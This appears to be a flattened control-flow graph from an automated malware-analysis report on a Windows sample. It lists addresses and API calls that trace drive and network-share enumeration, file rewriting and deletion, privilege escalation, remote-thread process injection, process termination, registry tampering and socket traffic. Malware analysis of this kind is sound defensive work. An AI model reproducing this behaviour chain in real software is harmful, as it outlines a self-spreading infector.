ReadFile CharLowerA lstrlen 8383 1293509 8381->8383 8381->8390 8383->8376 8384 129361f lstrcat 8384->8386 8385 1293633 lstrcat 8385->8386 8386->8384 8386->8385 8404 12844cb InterlockedExchange 8386->8404 8405 1292b8e 8386->8405 8388 1293658 6 API calls 8388->8366 8389 12936ef WriteFile CloseHandle SetFileAttributesA 8388->8389 8389->8366 8390->8376 8390->8381 8390->8383 8391 1293465 lstrcpy GetFileAttributesA 8390->8391 8391->8383 8392 1293491 CloseHandle CreateFileA 8391->8392 8392->8383 8393 12934c9 WriteFile CloseHandle SetFileAttributesA 8392->8393 8393->8383 8395 1291e89 RegCloseKey 8394->8395 8396 1291de5 RegEnumValueA 8394->8396 8395->8353 8397 1291e29 8396->8397 8398 1291e34 8396->8398 8397->8398 8399 1291e36 GetFileAttributesA 8397->8399 8398->8395 8400 1291e48 8399->8400 8401 1291e5f Sleep 8400->8401 8402 128e329 48 API calls 8400->8402 8401->8395 8401->8396 8402->8400 8403->8359 8404->8386 8406 1292c23 8405->8406 8442 12844cb InterlockedExchange 8406->8442 8408 1292c2b 8409 1292c49 lstrcat 8408->8409 8443 1292a35 lstrlen 8408->8443 8464 12844cb InterlockedExchange 8409->8464 8412 1292c46 8412->8409 8413 1292c5e 8414 1292c79 8413->8414 8415 1292a35 10 API calls 8413->8415 8416 1292e04 8414->8416 8417 1292ca4 8414->8417 8415->8414 8473 12844cb InterlockedExchange 8416->8473 8465 12844cb InterlockedExchange 8417->8465 8420 1292e09 8421 1292e24 8420->8421 8422 1292a35 10 API calls 8420->8422 8421->8388 8422->8421 8423 1292dff 8423->8388 8424 1292ca9 8424->8423 8466 12844cb InterlockedExchange 8424->8466 8426 1292cf4 8427 1292d12 lstrcpy 8426->8427 8429 1292a35 10 API calls 8426->8429 8467 1292962 8427->8467 8430 1292d0f 8429->8430 8430->8427 8431 1292d44 8432 1292dee lstrcat 8431->8432 8471 12844cb InterlockedExchange 8431->8471 8432->8423 8434 1292d68 8435 1292d7a lstrcat 8434->8435 8436 1292d8c lstrcat 8434->8436 8435->8436 8472 12844cb InterlockedExchange 8436->8472 8438 1292da3 8439 1292db5 lstrcat 8438->8439 8440 1292dc7 lstrlen wsprintfA 8438->8440 8439->8440 8440->8432 8441->8379 8442->8408 8474 12844cb InterlockedExchange 8443->8474 8445 1292a61 8446 1292a73 lstrcat 8445->8446 8447 1292a82 8445->8447 8446->8447 8475 12844cb InterlockedExchange 8447->8475 8449 1292a87 8450 1292a99 lstrcat 8449->8450 8451 1292aa8 lstrcat 8449->8451 8450->8451 8476 12844cb InterlockedExchange 8451->8476 8453 1292abc 8477 12844cb InterlockedExchange 8453->8477 8455 1292b6e 8456 1292962 InterlockedExchange 8455->8456 8457 1292b77 lstrcat 8456->8457 8457->8412 8458 1292b08 lstrlen 8459 128a16b 2 API calls 8458->8459 8462 1292aca 8459->8462 8460 12844cb InterlockedExchange 8460->8462 8461 1292b37 lstrcat 8461->8462 8462->8455 8462->8458 8462->8460 8462->8461 8463 1292b5d lstrcat 8462->8463 8463->8462 8464->8413 8465->8424 8466->8426 8469 1292976 8467->8469 8468 1292a31 8468->8431 8469->8468 8470 12844cb InterlockedExchange 8469->8470 8470->8469 8471->8434 8472->8438 8473->8420 8474->8445 8475->8449 8476->8453 8477->8462 8479 1288fae 8478->8479 8480 12890b5 8478->8480 8481 1288fbc RegEnumValueA 8479->8481 8482 1288ff3 8479->8482 8484 1288ff5 RegDeleteValueA 8479->8484 8480->7448 8481->8479 8481->8482 8483 128901d RegEnumKeyExA 8482->8483 8486 1289050 8482->8486 8487 1289052 wsprintfA 8482->8487 8488 1289084 RegDeleteKeyA 8482->8488 8483->8482 8485 12890ab RegCloseKey 8483->8485 8484->8481 8485->8480 8486->8485 8487->8482 8488->8483 8490 1289342 lstrcat 8489->8490 8491 1289354 lstrcat lstrcat 8489->8491 8490->8491 8492 128938a 8491->8492 8492->7470 8494 12891ae 8493->8494 8495 12891b5 CloseHandle 8493->8495 8494->8495 8495->7476 8498 1289258 8496->8498 8497 12892d9 SetFileAttributesA DeleteFileA 8497->7477 8498->8497 8500 128978e lstrcat 8499->8500 8501 12897a0 8499->8501 8500->8501 8502 12897c4 GlobalAlloc 8501->8502 8504 12897f6 8501->8504 8503 12897f1 8502->8503 8503->8504 8505 1289805 lstrcat 8503->8505 8504->7450 8504->7485 8506 128a75a 10 API calls 8505->8506 8507 128984d CopyFileA 8506->8507 8508 128986a LoadLibraryExA 8507->8508 8509 1289881 8507->8509 8508->8509 8510 128988a LoadLibraryExA 8509->8510 8511 12898b1 GlobalFree GetProcAddress 8509->8511 8510->8504 8510->8511 8511->8504 8512 12898e7 8511->8512 8512->8504 8513 1289997 GlobalAlloc 8512->8513 8514 12899d1 CreateFileA 8513->8514 8514->8504 8516 1289a62 WriteFile CloseHandle GlobalFree FreeLibrary 8514->8516 8516->8504 8517 1289ab8 DeleteFileA 8516->8517 8517->8504 8519 1289ec1 8518->8519 8520 1289edc RtlExitUserThread 8519->8520 8531 1289c4f CreateToolhelp32Snapshot 8519->8531 8522 1289ecf Sleep 8522->8519 8529 128944d 8523->8529 8524 1289459 Sleep 8524->8529 8525 12894c7 RtlExitUserThread 8526 12894ba Sleep 8526->8529 8527 128948a lstrlen 8527->8526 8527->8529 8529->8524 8529->8525 8529->8526 8529->8527 8530 128946d Sleep 8529->8530 8530->8529 8532 1289eac CloseHandle 8531->8532 8533 1289cac Process32First 8531->8533 8532->8522 8534 1289db8 Process32Next 8533->8534 8535 1289cea CharUpperA 8533->8535 8534->8532 8536 1289dd3 CharUpperA 8534->8536 8539 1289d03 8535->8539 8538 1289df2 8536->8538 8537 1289d71 8537->8534 8556 1289b56 CreateToolhelp32Snapshot Module32First 8537->8556 8538->8534 8540 1289b56 5 API calls 8538->8540 8544 1289acf 6 API calls 8538->8544 8549 1289acf 6 API calls 8538->8549 8539->8537 8551 1289acf CreateFileA 8539->8551 8540->8538 8542 1289d8b 8542->8534 8545 1289acf 6 API calls 8542->8545 8547 1289e11 Sleep 8544->8547 8548 1289d9e Sleep 8545->8548 8547->8534 8548->8534 8550 1289e89 Sleep 8549->8550 8550->8538 8552 1289b00 OpenProcess 8551->8552 8553 1289b32 WriteFile CloseHandle 8551->8553 8554 1289b1a TerminateProcess CloseHandle 8552->8554 8555 1289b30 Sleep 8552->8555 8553->8555 8554->8555 8555->8537 8557 1289c37 CloseHandle 8556->8557 8560 1289bce 8556->8560 8557->8542 8558 1289c20 Module32Next 8558->8557 8558->8560 8559 1289bd7 CharUpperA 8559->8560 8560->8558 8560->8559 8561 1289c14 8560->8561 8561->8557 8563 129276d CloseHandle 8562->8563 8564 129255d Process32First 8562->8564 8563->7495 8565 129266f Process32Next 8564->8565 8566 1292591 8564->8566 8565->8563 8567 129268a 8565->8567 8566->8565 8568 129259e lstrlen 8566->8568 8567->8565 8569 1292697 lstrlen 8567->8569 8580 1291ef6 8567->8580 8570 12925c8 lstrcpy 8568->8570 8571 12925b0 lstrcpyn 8568->8571 8573 12926a9 lstrcpyn 8569->8573 8574 12926c1 lstrcpy 8569->8574 8572 12925dc 7 API calls 8570->8572 8571->8572 8572->8565 8575 1292659 8572->8575 8576 12926d5 7 API calls 8573->8576 8574->8576 8577 1291ef6 38 API calls 8575->8577 8576->8567 8578 129266c 8577->8578 8578->8565 8581 1298060 8580->8581 8582 1291f20 OpenProcess 8581->8582 8583 1291ffa GetLastError 8582->8583 8584 12921a7 OpenProcessToken 8582->8584 8585 1292009 GetVersionExA 8583->8585 8622 1292042 8583->8622 8586 12921cd GetTokenInformation 8584->8586 8584->8622 8587 129204e GetCurrentThread OpenThreadToken 8585->8587 8585->8622 8588 12921f7 GetLastError 8586->8588 8586->8622 8591 12920b3 LookupPrivilegeValueA AdjustTokenPrivileges 8587->8591 8592 1292074 GetLastError 8587->8592 8593 129220e GetProcessHeap RtlAllocateHeap 8588->8593 8588->8622 8589 12924cb 8594 12924e1 8589->8594 8595 12924d4 CloseHandle 8589->8595 8590 12924b4 CloseHandle 8590->8589 8598 129211e GetLastError 8591->8598 8599 1292105 CloseHandle 8591->8599 8596 129208d GetCurrentProcess OpenProcessToken 8592->8596 8592->8622 8597 129223f GetTokenInformation 8593->8597 8593->8622 8600 12924ea GetProcessHeap HeapFree 8594->8600 8601 1292500 8594->8601 8595->8594 8596->8591 8596->8622 8602 1292273 LookupAccountSidA 8597->8602 8597->8622 8603 129212b CloseHandle 8598->8603 8604 1292144 OpenProcess AdjustTokenPrivileges CloseHandle 8598->8604 8599->8622 8600->8601 8601->8567 8605 12922c7 8602->8605 8602->8622 8603->8622 8606 1292199 8604->8606 8604->8622 8607 12922d2 lstrcmpiA 8605->8607 8605->8622 8606->8584 8608 12922e8 lstrcmpiA 8607->8608 8609 1292314 CreateMutexA 8607->8609 8608->8609 8610 12922fe lstrcmpiA 8608->8610 8609->8622 8610->8609 8611 129232e VirtualAllocEx 8610->8611 8613 12923cd VirtualAllocEx 8611->8613 8614 1292366 WriteProcessMemory 8611->8614 8616 12923fb 8613->8616 8613->8622 8615 1292398 CreateRemoteThread 8614->8615 8614->8622 8617 12923c6 8615->8617 8615->8622 8618 129240e lstrlen 8616->8618 8617->8613 8619 129772b 8618->8619 8620 129242c WriteProcessMemory 8619->8620 8621 1292460 CreateRemoteThread 8620->8621 8620->8622 8621->8622 8622->8589 8622->8590 8624 1298060 8623->8624 8625 12884ce InterlockedIncrement htons 8624->8625 8626 128857b 8625->8626 8643 128719b 8626->8643 8629 12886ba 8634 12886e5 InterlockedDecrement RtlExitUserThread 8629->8634 8630 12885a2 GetTickCount 8631 12885f5 8630->8631 8632 12885de 8630->8632 8633 1288651 8631->8633 8636 128862a 8631->8636 8658 1287f11 htons 8631->8658 8635 128719b 38 API calls 8632->8635 8637 1288673 8633->8637 8676 1287523 8633->8676 8635->8631 8636->8633 8664 12882b6 htons 8636->8664 8640 12886b5 8637->8640 8688 1286ebe 8637->8688 8640->8634 8644 1298060 8643->8644 8645 12871a8 socket 8644->8645 8646 128721c 8645->8646 8656 128734f 8645->8656 8647 1286981 InterlockedExchange 8646->8647 8650 128723a 8647->8650 8648 1287513 8648->8629 8648->8630 8649 1287506 closesocket 8649->8648 8651 1287250 sendto 8650->8651 8650->8656 8652 128727c select 8651->8652 8651->8656 8654 1287354 recvfrom 8652->8654 8652->8656 8655 128738d 8654->8655 8654->8656 8655->8656 8657 1286330 32 API calls 8655->8657 8656->8648 8656->8649 8657->8656 8659 1287f5f 8658->8659 8703 1287c4e socket 8659->8703 8662 1287f9b closesocket 8662->8636 8663 1287f7c send 8663->8662 8665 1288336 8664->8665 8719 12844cb InterlockedExchange 8665->8719 8667 128833e GetTickCount 8668 1287c4e 10 API calls 8667->8668 8669 1288368 8668->8669 8670 128837a send 8669->8670 8671 12883a2 8669->8671 8670->8671 8672 1288394 8670->8672 8673 12883c4 8671->8673 8675 12883b7 closesocket 8671->8675 8720 128811c 8672->8720 8673->8633 8675->8673 8677 1298060 8676->8677 8678 1287530 socket 8677->8678 8679 1286981 InterlockedExchange 8678->8679 8680 128759e 8679->8680 8681 12876b3 8680->8681 8682 12875b4 sendto 8680->8682 8683 128776e 8681->8683 8684 1287761 closesocket 8681->8684 8682->8681 8685 12875e0 select 8682->8685 8683->8637 8684->8683 8685->8681 8687 12876b8 recvfrom 8685->8687 8687->8681 8689 1298060 8688->8689 8690 1286ecb socket 8689->8690 8691 128705c 8690->8691 8692 1286f35 8690->8692 8694 128718b 8691->8694 8695 128717e closesocket 8691->8695 8693 1286981 InterlockedExchange 8692->8693 8696 1286f47 8693->8696 8694->8640 8695->8694 8696->8691 8697 1286f5d sendto 8696->8697 8697->8691 8698 1286f89 select 8697->8698 8698->8691 8700 1287061 recvfrom 8698->8700 8700->8691 8701 128709a 8700->8701 8701->8691 8702 1285e86 2 API calls 8701->8702 8702->8691 8704 1287c98 8703->8704 8705 1287ca1 8703->8705 8704->8705 8706 1287ca8 ioctlsocket 8704->8706 8705->8662 8705->8663 8707 1287cde connect 8706->8707 8708 1287d00 8707->8708 8709 1287d05 WSAGetLastError 8707->8709 8711 1287ec9 ioctlsocket 8708->8711 8710 1287d1d Sleep 8709->8710 8713 1287d27 8709->8713 8710->8707 8711->8705 8714 1287e58 select 8713->8714 8716 1287d35 closesocket 8713->8716 8715 1287e8e 8714->8715 8714->8716 8715->8716 8717 1287e99 __WSAFDIsSet 8715->8717 8716->8705 8717->8716 8718 1287eb0 __WSAFDIsSet 8717->8718 8718->8711 8718->8716 8719->8667 8735 1287fa9 8720->8735 8723 128824d 8725 1288289 8723->8725 8728 128827f closesocket 8723->8728 8724 128824f 8724->8723 8727 1288255 send 8724->8727 8725->8671 8726 1288192 GlobalAlloc 8730 12881c2 8726->8730 8727->8723 8728->8725 8729 12881d7 recv 8729->8730 8731 1288204 8729->8731 8730->8729 8730->8731 8732 1288234 8731->8732 8734 1286330 32 API calls 8731->8734 8732->8723 8733 1288240 GlobalFree 8732->8733 8733->8723 8734->8732 8738 1287fd3 8735->8738 8736 12880e6 recv 8737 12880e4 8736->8737 8737->8723 8737->8724 8737->8726 8738->8736 8738->8737 8739 128809c select 8738->8739 8739->8736 8739->8737 8741 128811c 39 API calls 8740->8741 8742 12882a3 RtlExitUserThread 8741->8742 8744 1287a1f GlobalFree RtlExitUserThread 8743->8744 8745 12877b5 8743->8745 8745->8744 8746 12878ff 8745->8746 8747 1287824 8745->8747 8748 128794b 8746->8748 8749 128790b 8746->8749 8750 128784f htons 8747->8750 8748->8744 8768 1286330 32 API calls 8748->8768 8770 1287999 8748->8770 8751 1286981 InterlockedExchange 8749->8751 8752 128719b 38 API calls 8750->8752 8753 128791a 8751->8753 8756 1287875 8752->8756 8757 1287926 sendto 8753->8757 8775 12878f7 8753->8775 8754 12879e4 8761 1286981 InterlockedExchange 8754->8761 8755 12879a7 8758 1286981 InterlockedExchange 8755->8758 8759 128787c 8756->8759 8760 1287895 8756->8760 8757->8775 8763 12879b6 8758->8763 8764 1286981 InterlockedExchange 8759->8764 8762 1286981 InterlockedExchange 8760->8762 8765 12879f3 8761->8765 8767 128788d 8762->8767 8769 12879c2 sendto 8763->8769 8763->8775 8764->8767 8765->8744 8766 12879ff sendto 8765->8766 8766->8744 8771 12878d0 8767->8771 8772 12878b0 sendto 8767->8772 8768->8770 8769->8775 8770->8754 8770->8755 8773 12878d6 htons 8771->8773 8771->8775 8772->8771 8774 1285e86 2 API calls 8773->8774 8774->8775 8775->8744 8856 130d760 8858 130d765 8856->8858 8859 130d78b LoadLibraryExA 8858->8859 8868 130d778 __common_dcos_data 8858->8868 8861 130d9c0 __common_dcos_data 7 API calls 8859->8861 8862 130d83c 8861->8862 8886 130d9c5 8862->8886 8866 130d7cf GetModuleFileNameA 8869 130d9a0 Sleep 8866->8869 8870 130d93f LoadLibraryExA GetProcAddress 8866->8870 8867 130d896 MapViewOfFile 8867->8866 8868->8866 8877 130d9c0 8868->8877 8872 130d9ab ExitProcess 8869->8872 8870->8869 8871 130d96c CreateMutexA GetLastError 8870->8871 8871->8869 8871->8872 8874 130d803 __common_dcos_data 8876 130d9c0 __common_dcos_data 7 API calls 8874->8876 8876->8859 8878 130d9c4 8877->8878 8879 130d91a GetModuleFileNameA 8877->8879 8878->8874 8881 130d9a0 Sleep 8879->8881 8882 130d93f LoadLibraryExA GetProcAddress 8879->8882 8884 130d9ab ExitProcess 8881->8884 8882->8881 8883 130d96c CreateMutexA GetLastError 8882->8883 8883->8881 8883->8884 8887 130d9c9 8886->8887 8887->8886 8887->8887 8888 130d9cc GetProcAddress 8887->8888 8890 130d853 SetErrorMode CreateFileMappingA CreateFileMappingA 8887->8890 8889 130d9c0 __common_dcos_data 7 API calls 8888->8889 8889->8887 8890->8866 8890->8867 8787 1293238 8803 12931f9 8787->8803 8788 1293734 Sleep 8788->8803 8789 1293278 GetDriveTypeA 8790 12932bc lstrcat CreateFileA 8789->8790 8789->8803 8793 12932ff GetFileTime FileTimeToSystemTime 8790->8793 8794 1293522 GetFileAttributesA 8790->8794 8791 1293744 RtlExitUserThread 8798 129333d 8793->8798 8799 1293515 CloseHandle 8793->8799 8796 1293569 CreateFileA 8794->8796 8797 129353e SetFileAttributesA DeleteFileA 8794->8797 8795 1292ebc 11 API calls 8800 129320b Sleep GetLogicalDrives 8795->8800 8802 1293598 GetSystemTime SystemTimeToFileTime 8796->8802 8796->8803 8816 128a2ad SHFileOperation RemoveDirectoryA 8797->8816 8798->8799 8805 1293372 ReadFile CharLowerA lstrlen 8798->8805 8813 1293465 lstrcpy GetFileAttributesA 8798->8813 8799->8794 8800->8803 8804 128a16b 2 API calls 8802->8804 8803->8788 8803->8789 8803->8791 8803->8795 8803->8796 8807 1293605 8804->8807 8805->8798 8808 129361f lstrcat 8807->8808 8809 1293633 lstrcat 8807->8809 8810 1292b8e 18 API calls 8807->8810 8817 12844cb InterlockedExchange 8807->8817 8808->8807 8809->8807 8811 1293658 6 API calls 8810->8811 8811->8803 8812 12936ef WriteFile CloseHandle SetFileAttributesA 8811->8812 8812->8803 8813->8798 8814 1293491 CloseHandle CreateFileA 8813->8814 8814->8798 8815 12934c9 WriteFile CloseHandle SetFileAttributesA 8814->8815 8815->8798 8816->8803 8817->8807 9007 1284bf9 9008 1284c08 9007->9008 9009 1284d68 RegCloseKey 9008->9009 9010 1284c15 wsprintfA 9008->9010 9011 1284d75 9009->9011 9012 1284c6d 9010->9012 9013 1284c60 9010->9013 9016 1284d13 RegSetValueExA 9012->9016 9017 1284d36 lstrlen RegSetValueExA 9012->9017 9013->9012 9014 1284cbc 9013->9014 9015 1284ce5 9013->9015 9019 1284a5b 2 API calls 9014->9019 9020 1284a5b 2 API calls 9015->9020 9018 1284d63 9016->9018 9017->9018 9021 1284cd2 lstrcpy 9019->9021 9022 1284cf9 lstrcpy 9020->9022 9021->9012 9022->9012 8909 12890ba CreateFileA 8910 12890f2 8909->8910 8911 12890f4 WriteFile CloseHandle 8909->8911 8911->8910 8913 1291ab1 8917 1291a5a 8913->8917 8914 1291acf 8916 1291c77 8914->8916 8919 1291c51 8914->8919 8920 1291b14 lstrcpy lstrcat 8914->8920 8915 1291c8d Sleep 8915->8917 8917->8914 8917->8915 8918 1291c9d GlobalFree WNetCloseEnum 8917->8918 8925 1291a79 WNetEnumResourceA 8917->8925 8921 1291ccd 8918->8921 8923 129195d 121 API calls 8919->8923 8922 1290b9a 7 API calls 8920->8922 8927 1291b47 8922->8927 8924 1291c69 Sleep 8923->8924 8924->8916 8925->8917 8926 1291c7e GetLastError 8925->8926 8926->8915 8928 1291c8b 8926->8928 8927->8919 8929 1291b6b lstrcpy lstrlen 8927->8929 8930 1291be3 8927->8930 8928->8918 8932 1291ba8 lstrlen 8929->8932 8933 1291b96 lstrcat 8929->8933 8931 1291c38 8930->8931 8937 1291c0f lstrlen 8930->8937 8931->8919 8935 1291c44 DeleteFileA 8931->8935 8934 128a16b 2 API calls 8932->8934 8933->8932 8936 1291bc2 lstrcat 8934->8936 8935->8919 8938 1290c4b 5 API calls 8936->8938 8939 1291060 91 API calls 8937->8939 8938->8930 8939->8931 8940 12844b1 8943 12844bb GetTickCount 8940->8943 8942 12844b9 8943->8942 9023 1288bf1 9034 1288a39 9023->9034 9024 1288d8d Sleep 9024->9034 9025 1288da5 Sleep 9025->9034 9026 1288cae lstrcpy 9026->9034 9027 1288db5 RtlExitUserThread 9029 1288bab Sleep 9029->9034 9030 128a75a 10 API calls 9030->9034 9031 1290945 18 API calls 9031->9034 9032 1288b2a IsBadWritePtr 9032->9034 9033 12914d9 28 API calls 9033->9034 9034->9024 9034->9025 9034->9026 9034->9027 9034->9029 9034->9030 9034->9031 9034->9032 9034->9033 9035 12845d2 4 API calls 9034->9035 9036 1284631 3 API calls 9034->9036 9035->9034 9037 1288b86 Sleep 9036->9037 9037->9034 9038 12888f3 9039 128890a inet_addr 9038->9039 9040 1288906 9038->9040 9041 128891d 9039->9041 9042 128892e gethostbyname 9039->9042 9041->9040 9041->9042 9042->9040 8820 1284f36 8821 1284f45 8820->8821 8822 1284f52 wsprintfA 8821->8822 8823 1285085 RegCloseKey 8821->8823 8824 1284f9c 8822->8824 8829 1284fa9 8822->8829 8836 12850d2 8823->8836 8827 1284fe5 8824->8827 8828 1285007 8824->8828 8824->8829 8831 1285215 8824->8831 8825 1285030 RegSetValueExA 8830 1285080 8825->8830 8826 1285053 lstrlen RegSetValueExA 8826->8830 8832 1284a5b 2 API calls 8827->8832 8833 1284a5b 2 API calls 8828->8833 8829->8825 8829->8826 8835 1284ff4 lstrcpy 8832->8835 8834 1285016 lstrcpy 8833->8834 8834->8829 8835->8829 8837 12850f9 GlobalFree 8836->8837 8838 1285106 8836->8838 8837->8838 8950 1292c88 8951 1292c97 8950->8951 8952 1292e04 8951->8952 8953 1292ca4 8951->8953 8981 12844cb InterlockedExchange 8952->8981 8977 12844cb InterlockedExchange 8953->8977 8956 1292e09 8957 1292e24 8956->8957 8958 1292a35 10 API calls 8956->8958 8958->8957 8959 1292dff 8960 1292ca9 8960->8959 8978 12844cb InterlockedExchange 8960->8978 8962 1292cf4 8963 1292d12 lstrcpy 8962->8963 8965 1292a35 10 API calls 8962->8965 8964 1292962 InterlockedExchange 8963->8964 8968 1292d44 8964->8968 8966 1292d0f 8965->8966 8966->8963 8967 1292dee lstrcat 8967->8959 8968->8967 8979 12844cb InterlockedExchange 8968->8979 8970 1292d68 8971 1292d7a lstrcat 8970->8971 8972 1292d8c lstrcat 8970->8972 8971->8972 8980 12844cb InterlockedExchange 8972->8980 8974 1292da3 8975 1292db5 lstrcat 8974->8975 8976 1292dc7 lstrlen wsprintfA 8974->8976 8975->8976 8976->8967 8977->8960 8978->8962 8979->8970 8980->8974 8981->8956 9043 128b3c9 9044 128b3db 9043->9044 9045 128b3d3 9043->9045 9046 1284503 InterlockedExchange 9044->9046 9046->9045 9047 1288ec9 9048 1288ee2 9047->9048 9049 1288f2f lstrcpyn 9048->9049 9050 1288f47 9048->9050 9049->9050 9051 1287fca 9054 1287fd3 9051->9054 9052 12880e4 9053 12880e6 recv 9053->9052 9054->9052 9054->9053 9055 128809c select 9054->9055 9055->9052 9055->9053 9056 12908ce 9057 12908d8 9056->9057 9058 12908ef RtlLeaveCriticalSection 9057->9058 9059 12908de GlobalFree 9057->9059 9060 129090a Sleep 9058->9060 9061 1290915 9058->9061 9059->9058 9060->9061 9062 1288dc4 9063 1288dce RtlExitUserThread 9062->9063 8891 130d440 8892 130d760 8891->8892 8893 130d765 __common_dcos_data 20 API calls 8892->8893 7065 1317ac0 7066 1317ad8 7065->7066 7067 1317bf2 LoadLibraryA 7066->7067 7072 1317c37 VirtualProtect VirtualProtect 7066->7072 7068 1317c09 7067->7068 7068->7066 7071 1317c1b GetProcAddress 7068->7071 7070 1317c9c 7070->7070 7071->7068 7073 1317c31 ExitProcess 7071->7073 7072->7070 7074 5b30000 7076 5b30005 7074->7076 7083 5b30018 7076->7083 7096 5b3002b LoadLibraryExA 7076->7096 7081 5b3006f GetModuleFileNameA 7087 5b30240 Sleep 7081->7087 7088 5b301df LoadLibraryExA GetProcAddress 7081->7088 7083->7081 7091 5b30260 7 API calls 7083->7091 7085 5b30170 CreateThread 7085->7081 7111 5b306d1 7085->7111 7086 5b30136 MapViewOfFile 7086->7085 7089 5b3014c 7086->7089 7090 5b3024b ExitProcess 7087->7090 7088->7087 7092 5b3020c CreateMutexA GetLastError 7088->7092 7089->7085 7094 5b300a3 7091->7094 7092->7087 7092->7090 7095 5b30260 7 API calls 7094->7095 7095->7096 7097 5b30260 7096->7097 7098 5b300dc 7097->7098 7099 5b301ba GetModuleFileNameA 7097->7099 7106 5b30265 7098->7106 7101 5b30240 Sleep 7099->7101 7102 5b301df LoadLibraryExA GetProcAddress 7099->7102 7103 5b3024b ExitProcess 7101->7103 7102->7101 7104 5b3020c CreateMutexA GetLastError 7102->7104 7104->7101 7104->7103 7107 5b30269 7106->7107 7107->7106 7107->7107 7108 5b3026c GetProcAddress 7107->7108 7110 5b300f3 SetErrorMode CreateFileMappingA CreateFileMappingA 7107->7110 7109 5b30260 7 API calls 7108->7109 7109->7107 7110->7085 7110->7086 7112 5b307e0 CreateMutexA 7111->7112 7113 5b306e5 7111->7113 7112->7113 7113->7112 7114 5b30809 Sleep 7113->7114 7115 5b30816 7113->7115 7114->7112 8839 128511e 8840 128512d 8839->8840 8841 128513a wsprintfA 8840->8841 8847 128529e 8840->8847 8842 12851a0 RegQueryValueExA 8841->8842 8843 1285165 RegQueryValueExA 8841->8843 8846 1285199 8842->8846 8843->8846 8844 1285440 8845 1285433 RegCloseKey 8845->8844 8848 1286330 32 API calls 8847->8848 8849 1285403 8847->8849 8848->8849 8849->8844 8849->8845 9064 12933df 9069 129333d 9064->9069 9065 1293515 CloseHandle 9066 1293522 GetFileAttributesA 9065->9066 9067 1293569 CreateFileA 9066->9067 9068 129353e SetFileAttributesA DeleteFileA 9066->9068 9072 1293598 GetSystemTime SystemTimeToFileTime 9067->9072 9074 12931f9 9067->9074 9093 128a2ad SHFileOperation RemoveDirectoryA 9068->9093 9069->9065 9070 1293465 lstrcpy GetFileAttributesA 9069->9070 9092 1293372 ReadFile CharLowerA lstrlen 9069->9092 9070->9069 9073 1293491 CloseHandle CreateFileA 9070->9073 9075 128a16b 2 API calls 9072->9075 9073->9069 9076 12934c9 WriteFile CloseHandle SetFileAttributesA 9073->9076 9074->9067 9077 1293734 Sleep 9074->9077 9079 1293744 RtlExitUserThread 9074->9079 9081 1292ebc 11 API calls 9074->9081 9088 1293278 GetDriveTypeA 9074->9088 9085 1293605 9075->9085 9076->9069 9077->9074 9084 129320b Sleep GetLogicalDrives 9081->9084 9082 129361f lstrcat 9082->9085 9083 1293633 lstrcat 9083->9085 9084->9074 9085->9082 9085->9083 9086 1292b8e 18 API calls 9085->9086 9094 12844cb InterlockedExchange 9085->9094 9087 1293658 6 API calls 9086->9087 9087->9074 9089 12936ef WriteFile CloseHandle SetFileAttributesA 9087->9089 9088->9074 9090 12932bc lstrcat CreateFileA 9088->9090 9089->9074 9090->9066 9091 12932ff GetFileTime FileTimeToSystemTime 9090->9091 9091->9065 9091->9069 9092->9069 9093->9074 9094->9085 7116 4fd0000 7119 4fd015d 7116->7119 7118 4fd00ce 7118->7118 7123 4fd0172 7119->7123 7120 4fd0184 WSASocketA 7121 4fd01a0 connect 7120->7121 7122 4fd01b9 recv 7121->7122 7121->7123 7122->7123 7123->7120 7123->7121 7123->7122 7124 4fd021f 7123->7124 7124->7118 9095 128f8d6 9096 128f8e5 9095->9096 9097 128f925 9096->9097 9098 128cd03 2 API calls 9096->9098 9099 128f9a1 9097->9099 9102 128cd03 2 API calls 9097->9102 9098->9097 9100 128f9f8 9099->9100 9103 128cd03 2 API calls 9099->9103 9154 12844cb InterlockedExchange 9100->9154 9102->9099 9103->9100 9104 128fa0e 9105 128fa55 9104->9105 9155 12844cb InterlockedExchange 9104->9155 9156 12844cb InterlockedExchange 9105->9156 9108 128fa82 9109 128cd03 2 API calls 9108->9109 9110 128fad5 9108->9110 9109->9110 9111 128cd03 2 API calls 9110->9111 9112 128fb50 9110->9112 9111->9112 9113 128c76b 2 API calls 9112->9113 9116 128fb9e 9112->9116 9113->9116 9114 128fc7e 9157 12844cb InterlockedExchange 9114->9157 9116->9114 9117 128cd03 2 API calls 9116->9117 9117->9114 9118 128fc94 9119 128fd1f 9118->9119 9120 128fd5c 9118->9120 9123 128cd03 2 API calls 9118->9123 9121 128b3ef InterlockedExchange 9119->9121 9122 128d34d 2 API calls 9120->9122 9132 128fdea 9120->9132 9121->9120 9124 128fe63 9122->9124 9123->9119 9124->9132 9133 128c89a 2 API calls 9124->9133 9125 12907db CloseHandle 9126 129088b CloseHandle SetFileAttributesA 9125->9126 9127 12907f5 SetFilePointer SetEndOfFile 9125->9127 9130 12908af 9126->9130 9131 12908b5 DeleteFileA 9126->9131 9128 129082b 9127->9128 9129 1290852 9127->9129 9128->9129 9134 1290831 WriteFile 9128->9134 9135 1290869 SetFileTime 9129->9135 9136 1290858 GlobalFree 9129->9136 9130->9131 9137 12908bf 9130->9137 9131->9137 9132->9125 9138 12907d1 UnmapViewOfFile 9132->9138 9139 1290793 GlobalAlloc 9132->9139 9140 12905ed 9132->9140 9146 128fe88 9133->9146 9134->9129 9135->9126 9136->9135 9141 12908ef RtlLeaveCriticalSection 9137->9141 9142 12908de GlobalFree 9137->9142 9138->9125 9139->9140 9140->9138 9143 129090a Sleep 9141->9143 9144 1290915 9141->9144 9142->9141 9143->9144 9145 1286981 InterlockedExchange 9147 12903c7 9145->9147 9146->9132 9146->9145 9158 12844cb InterlockedExchange 9147->9158 9149 12904ed GetTickCount 9149->9132 9150 129051a 9149->9150 9159 12844cb InterlockedExchange 9150->9159 9152 129051f 9152->9132 9160 12844cb InterlockedExchange 9152->9160 9154->9104 9155->9104 9156->9108 9157->9118 9158->9149 9159->9152 9160->9152

                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                    Function 01293B60 Relevance: 121.3, APIs: 62, Strings: 7, Instructions: 599stringregistrylibraryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
